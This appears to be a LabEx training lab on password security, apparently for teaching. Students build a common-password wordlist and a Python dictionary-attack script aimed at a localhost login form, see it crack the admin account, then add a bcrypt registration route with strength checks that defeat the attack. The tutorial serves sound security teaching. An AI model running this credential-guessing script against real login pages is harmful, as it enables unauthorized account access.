In this lab, you will take on the role of a security researcher tasked with testing the password security of a web application. You will explore the vulnerabilities of weak passwords and learn techniques used to crack them. This hands-on experience will provide insights into both offensive techniques and the importance of robust defensive measures in cybersecurity.
In this step, we will gather information about our target website, a crucial first phase in any security assessment.
http://localhost:8080/. You can access this by clicking on the Web 8080 tab in the LabEx environment.
Note: In the LabEx virtual machine, the web server operates on a temporary public network. This means the domain name you see may not be "localhost" but an actual accessible domain. This is normal and does not affect the lab exercise.
Carefully examine the login form. Take note of the following:
Attempt to log in using a few random combinations of usernames and passwords. For example:
test, Password: password123admin, Password: adminuser, Password: 12345You should receive an "Invalid username or password" message for each attempt.
This initial reconnaissance helps us understand the system we're dealing with and informs our next steps in attempting to crack the passwords.
Now that we've gathered information about the login system, we'll create a dictionary of potential passwords. This is a common technique used in password cracking attempts.
passwords.txt file:cat << EOF > ~/project/password_lab/passwords.txt
123456
password
qwerty
letmein
admin
welcome
monkey
123456789
1234567890
superman
supersecret123
iloveyou
password123
123123
000000
12345678
sunshine
qwerty123
1q2w3e4r
111111
1234567
starwars
dragon
princess
adobe123
football
ashley
bailey
trustno1
passw0rd
whatever
EOFThis command uses a technique called a "here document" in bash. It allows us to create a file with multiple lines of text in a single command. Here's how it works:
cat << EOF > filename: This tells the system to take all the text up until it sees "EOF" (End Of File) and write it to the specified filename.EOF and the second EOF is the content that will be written to the file.EOF marks the end of the text to be written.After running this command, you'll have created a file named passwords.txt in the ~/project/password_lab/ directory, containing a list of commonly used (and therefore weak) passwords.
In a real-world scenario, attackers might use much larger dictionaries, often containing millions of passwords. These could include:
Creating and using such dictionaries for unauthorized access is illegal and unethical. We're using this small dictionary for educational purposes only, to understand how these attacks work and how to defend against them.
With our password dictionary in place, we'll now create a Python script to automate the process of testing these passwords against our target website.
Open the terminal on the Desktop if it's not already open.
Enter the following command to open a new file named password_cracker.py in the nano text editor:
nano ~/project/password_lab/password_cracker.pyimport requests
import time
def crack_password(username, password_list):
url = 'http://localhost:8080'
for password in password_list:
response = requests.post(url, data={'username': username, 'password': password.strip()})
if 'Login successful!' in response.text:
print(f"Succeeded! {username} with password: {password.strip()}")
else:
print(f"Failed attempt for {username} with password: {password.strip()}")
time.sleep(0.1) ## Small delay to avoid overwhelming the server
def main():
usernames = ['admin', 'user', 'root', 'administrator', 'webmaster']
with open('passwords.txt', 'r') as f:
passwords = f.readlines()
for username in usernames:
print(f"Attempting to crack password for user: {username}")
crack_password(username, passwords)
if __name__ == '__main__':
main()Ctrl+X, then Y, and finally Enter.Let's break down what this script does:
The crack_password function:
The main function:
passwords.txt file.crack_password with the list of passwords.This script automates the process of trying many username and password combinations, similar to how an attacker might approach breaking into a system. However, it's important to note that using such techniques without permission is illegal and unethical. We're using this for educational purposes only, to understand how these attacks work and how to defend against them.
Now that we have our password cracking script, we'll run it and analyze the results.
cd ~/project/password_labpython password_cracker.pylabex:password_lab/ $ python password_cracker.py
Attempting to crack password for user: admin
Failed attempt for admin with password: 123456
Failed attempt for admin with password: password
Failed attempt for admin with password: qwerty
Failed attempt for admin with password: letmein
Failed attempt for admin with password: admin
Failed attempt for admin with password: welcome
Failed attempt for admin with password: monkey
Failed attempt for admin with password: 123456789
Failed attempt for admin with password: 1234567890
Failed attempt for admin with password: superman
Succeeded! admin with password: supersecret123This exercise demonstrates how weak passwords can be easily guessed using common words or patterns. In this case, "admin" with the password "supersecret123" was vulnerable to our dictionary attack.
It's crucial to understand that while this script was successful in this controlled environment, attempting to use such techniques against real systems without explicit permission is illegal and unethical. This knowledge should be used to understand vulnerabilities and improve security, not to exploit systems.
Now that we've successfully cracked some passwords, let's implement better password policies to prevent such attacks.
WebIDE Tab in the LabEx VM. WebIDE is a web-based integrated development environment that allows you to write, run, and debug code directly in your browser. It's similar to the VS Code editor but runs in the browser. WebIDE is suitable for editing longer code files.
app.py file to open it in the editor.users dictionary to implement password strength checks:import re
def is_strong_password(password):
if len(password) < 12:
return False
if not re.search(r'[A-Z]', password):
return False
if not re.search(r'[a-z]', password):
return False
if not re.search(r'\d', password):
return False
if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
return False
return True
This function checks if a password:
if __name__ == '__main__': line:@app.route('/register', methods=['GET', 'POST'])
def register():
message = ''
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
if username and password:
if is_strong_password(password):
if username not in users:
users[username] = bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt())
message = 'Registration successful!'
else:
message = 'Username already exists'
else:
message = 'Password is not strong enough'
else:
message = 'Username and password are required'
return render_template_string('''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Secure Registration</title>
<script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 h-screen flex items-center justify-center">
<div class="bg-white p-8 rounded-lg shadow-md w-96">
<h2 class="text-2xl font-bold mb-6 text-center text-gray-800">Secure Registration</h2>
<form method="post" class="space-y-4">
<div>
<label for="username" class="block text-sm font-medium text-gray-700">Username</label>
<input type="text" id="username" name="username" required class="mt-1 block w-full px-3 py-2 bg-white border border-gray-300 rounded-md shadow-sm focus:outline-none focus:ring-indigo-500 focus:border-indigo-500">
</div>
<div>
<label for="password" class="block text-sm font-medium text-gray-700">Password</label>
<input type="password" id="password" name="password" required class="mt-1 block w-full px-3 py-2 bg-white border border-gray-300 rounded-md shadow-sm focus:outline-none focus:ring-indigo-500 focus:border-indigo-500">
</div>
<div>
<button type="submit" class="w-full flex justify-center py-2 px-4 border border-transparent rounded-md shadow-sm text-sm font-medium text-white bg-indigo-600 hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500">
Register
</button>
</div>
</form>
<p class="mt-4 text-center text-sm text-gray-600">{{ message }}</p>
<p class="mt-2 text-center text-xs text-gray-500">Password must be at least 12 characters long and contain uppercase, lowercase, numbers, and special characters.</p>
</div>
</body>
</html>
''', message=message)
This code creates a new route for user registration. It checks if the submitted password meets our strong password criteria before creating a new user.
pkill -f "python app.py"
python ~/project/password_lab/app.pyWeb 8080 tab, and add /register to the URL to access the new registration form:
Try to register a new account with a weak password (e.g., "password123"). Observe how the application enforces the new password policy.
Now, register a new account with a strong password that meets all the criteria. For example:
labexS3cureP@ssw0rd-2024This password meets all our requirements: it's over 12 characters long, contains uppercase and lowercase letters, numbers, and special characters.
After successfully registering, let's test our password cracking script against this new, strong password. Modify the password_cracker.py script:
nano ~/project/password_lab/password_cracker.pyusernames = ['admin', 'user', 'root', 'administrator', 'webmaster']usernames = ['labex']Run the modified script:
python ~/project/password_lab/password_cracker.pyObserve that the script fails to crack the new, strong password. This demonstrates the effectiveness of implementing strong password policies.
In this lab, you've experienced the process of ethical hacking and password security testing. Here's a recap of what you've accomplished:
